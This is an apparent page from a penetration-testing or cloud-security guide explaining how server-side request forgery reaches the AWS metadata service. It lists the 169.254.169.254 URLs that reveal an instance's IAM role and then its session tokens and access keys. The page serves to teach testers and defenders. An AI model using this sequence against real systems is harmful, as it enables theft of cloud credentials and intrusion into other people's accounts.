SSRF

Some systems serve critical data on localhost, loopback, and other non-exposed ports. With an SSRF, there is now the ability to read into places that normally could not be readable. Some of these endpoints could contain additional datasets that we can use to get further and further into an environment. One of the endpoints we will discuss is the AWS metadata service. The URL endpoint for all AWS metadata nodes is the same across all services and tenants.

This contains the metadata information for the AWS service in question

http://169.254.169.254/latest/meta-data

This will list out the role that the service is running as.

http://169.254.169.254/latest/meta-data/iam/security-credentials

Once you obtain the role, you can then query it to be able to see what the session tokens are and the AWS keys to be able to use them as well.

http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>

This is just one example of how SSRFs can be taken advantage of in a cloud environment, potentially providing much more information that had been available in other environments.

PreviousDeployment Pipeline NextLambda

Last updated 19 days ago